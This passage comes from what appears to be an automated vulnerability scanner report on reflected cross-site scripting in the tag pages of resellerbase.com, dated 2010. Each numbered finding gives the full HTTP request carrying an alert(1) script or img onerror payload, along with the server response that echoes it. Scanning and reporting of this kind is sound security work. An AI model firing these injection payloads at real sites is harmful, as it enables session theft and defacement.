<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: video
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : video648cb<img src=a onerror=alert(1)>b23d6872cd3]</td>
...[SNIP]...

2.4664. http://www.resellerbase.com/tag/video [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/video

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89ed6<img%20src%3da%20onerror%3dalert(1)>2efc0253b2b3a5b8 was submitted in the REST URL parameter 2. This input was echoed as 89ed6<img src=a onerror=alert(1)>2efc0253b2b3a5b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/video89ed6<img%20src%3da%20onerror%3dalert(1)>2efc0253b2b3a5b8?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/video
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: video
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : video89ed6<img src=a onerror=alert(1)>2efc0253b2b3a5b8]</td>
...[SNIP]...

2.4665. http://www.resellerbase.com/tag/web+cam [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/web+cam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9c662<script>alert(1)</script>97ca3e5463d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag9c662<script>alert(1)</script>97ca3e5463d/web+cam HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag9c662<script>alert(1)</script>97ca3e5463d/web+cam was not found on this server.</p>
...[SNIP]...

2.4666. http://www.resellerbase.com/tag/web+cam [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/web+cam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 667d0<script>alert(1)</script>49948159d41db7245 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag667d0<script>alert(1)</script>49948159d41db7245/web+cam?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/web+cam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag667d0<script>alert(1)</script>49948159d41db7245/web+cam?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4667. http://www.resellerbase.com/tag/web+cam [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/web+cam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload d17ec</title><img%20src%3da%20onerror%3dalert(1)>ae7643ed689c6d2a5 was submitted in the REST URL parameter 2. This input was echoed as d17ec</title><img src=a onerror=alert(1)>ae7643ed689c6d2a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/web+camd17ec</title><img%20src%3da%20onerror%3dalert(1)>ae7643ed689c6d2a5?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/web+cam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: web camd17ec</title><img src=a onerror=alert(1)>ae7643ed689c6d2a5</title>
...[SNIP]...

2.4668. http://www.resellerbase.com/tag/web+cam [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/web+cam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f0a47<img%20src%3da%20onerror%3dalert(1)>223dbb6790d was submitted in the REST URL parameter 2. This input was echoed as f0a47<img src=a onerror=alert(1)>223dbb6790d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/web+camf0a47<img%20src%3da%20onerror%3dalert(1)>223dbb6790d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: web c
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : web camf0a47<img src=a onerror=alert(1)>223dbb6790d]</td>
...[SNIP]...

2.4669. http://www.resellerbase.com/tag/web+cam [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/web+cam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 32a29<img%20src%3da%20onerror%3dalert(1)>5a6694fcd02dcc332 was submitted in the REST URL parameter 2. This input was echoed as 32a29<img src=a onerror=alert(1)>5a6694fcd02dcc332 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/web+cam32a29<img%20src%3da%20onerror%3dalert(1)>5a6694fcd02dcc332?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/web+cam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: web c
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : web cam32a29<img src=a onerror=alert(1)>5a6694fcd02dcc332]</td>
...[SNIP]...

2.4670. http://www.resellerbase.com/tag/web+cam [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/web+cam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 951dc</title><img%20src%3da%20onerror%3dalert(1)>9ea6fb7e0c2 was submitted in the REST URL parameter 2. This input was echoed as 951dc</title><img src=a onerror=alert(1)>9ea6fb7e0c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/web+cam951dc</title><img%20src%3da%20onerror%3dalert(1)>9ea6fb7e0c2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: web cam951dc</title><img src=a onerror=alert(1)>9ea6fb7e0c2</title>
...[SNIP]...

2.4671. http://www.resellerbase.com/tag/web+cam+chat [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/web+cam+chat

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f7be8<script>alert(1)</script>96f59d27fc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagf7be8<script>alert(1)</script>96f59d27fc2/web+cam+chat HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagf7be8<script>alert(1)</script>96f59d27fc2/web+cam+chat was not found on this server.</p>
...[SNIP]...

2.4672. http://www.resellerbase.com/tag/web+hosting [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/web+hosting

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ca930<script>alert(1)</script>00857bf835714eecb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagca930<script>alert(1)</script>00857bf835714eecb/web+hosting?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/web+hosting
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagca930<script>alert(1)</script>00857bf835714eecb/web+hosting?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4673. http://www.resellerbase.com/tag/web+hosting [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/web+hosting

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 276b4<script>alert(1)</script>3811c127324 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag276b4<script>alert(1)</script>3811c127324/web+hosting HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag276b4<script>alert(1)</script>3811c127324/web+hosting was not found on this server.</p>
...[SNIP]...

2.4674. http://www.resellerbase.com/tag/web+hosting [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/web+hosting

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 503d7<img%20src%3da%20onerror%3dalert(1)>cffd6ef0d6b46ae6f was submitted in the REST URL parameter 2. This input was echoed as 503d7<img src=a onerror=alert(1)>cffd6ef0d6b46ae6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/web+hosting503d7<img%20src%3da%20onerror%3dalert(1)>cffd6ef0d6b46ae6f?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/web+hosting
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: web h
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : web hosting503d7<img src=a onerror=alert(1)>cffd6ef0d6b46ae6f]</td>
...[SNIP]...

2.4675. http://www.resellerbase.com/tag/web+hosting [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/web+hosting

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload f73c7</title><img%20src%3da%20onerror%3dalert(1)>409e2676c765ae41 was submitted in the REST URL parameter 2. This input was echoed as f73c7</title><img src=a onerror=alert(1)>409e2676c765ae41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/web+hostingf73c7</title><img%20src%3da%20onerror%3dalert(1)>409e2676c765ae41?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/web+hosting
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: web hostingf73c7</title><img src=a onerror=alert(1)>409e2676c765ae41</title>
...[SNIP]...

2.4676. http://www.resellerbase.com/tag/web+hosting [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/web+hosting

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3c199<img%20src%3da%20onerror%3dalert(1)>3a053d3d0c3 was submitted in the REST URL parameter 2. This input was echoed as 3c199<img src=a onerror=alert(1)>3a053d3d0c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/web+hosting3c199<img%20src%3da%20onerror%3dalert(1)>3a053d3d0c3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:28:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: web h
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : web hosting3c199<img src=a onerror=alert(1)>3a053d3d0c3]</td>
...[SNIP]...

2.4677. http://www.resellerbase.com/tag/web+hosting [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/web+hosting

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 50913</title><img%20src%3da%20onerror%3dalert(1)>00b8adbbecd was submitted in the REST URL parameter 2. This input was echoed as 50913</title><img src=a onerror=alert(1)>00b8adbbecd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/web+hosting50913</title><img%20src%3da%20onerror%3dalert(1)>00b8adbbecd HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:29:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: web hosting50913</title><img src=a onerror=alert(1)>00b8adbbecd</title>
...[SNIP]...

2.4678. http://www.resellerbase.com/tag/web+statistics [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/web+statistics

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9bd38<script>alert(1)</script>a2ef342af42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag9bd38<script>alert(1)</script>a2ef342af42/web+statistics HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag9bd38<script>alert(1)</script>a2ef342af42/web+statistics was not found on this server.</p>
...[SNIP]...

2.4679. http://www.resellerbase.com/tag/webcam [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/webcam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 54183<script>alert(1)</script>cdadbb5b81d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag54183<script>alert(1)</script>cdadbb5b81d/webcam HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag54183<script>alert(1)</script>cdadbb5b81d/webcam was not found on this server.</p>
...[SNIP]...

2.4680. http://www.resellerbase.com/tag/webcam [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/webcam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1f956<script>alert(1)</script>5888b2c2f519c1fd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag1f956<script>alert(1)</script>5888b2c2f519c1fd1/webcam?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/webcam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag1f956<script>alert(1)</script>5888b2c2f519c1fd1/webcam?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4681. http://www.resellerbase.com/tag/webcam [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/webcam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 74a2a</title><img%20src%3da%20onerror%3dalert(1)>31a8c2c9e54d8318e was submitted in the REST URL parameter 2. This input was echoed as 74a2a</title><img src=a onerror=alert(1)>31a8c2c9e54d8318e in the application's response.

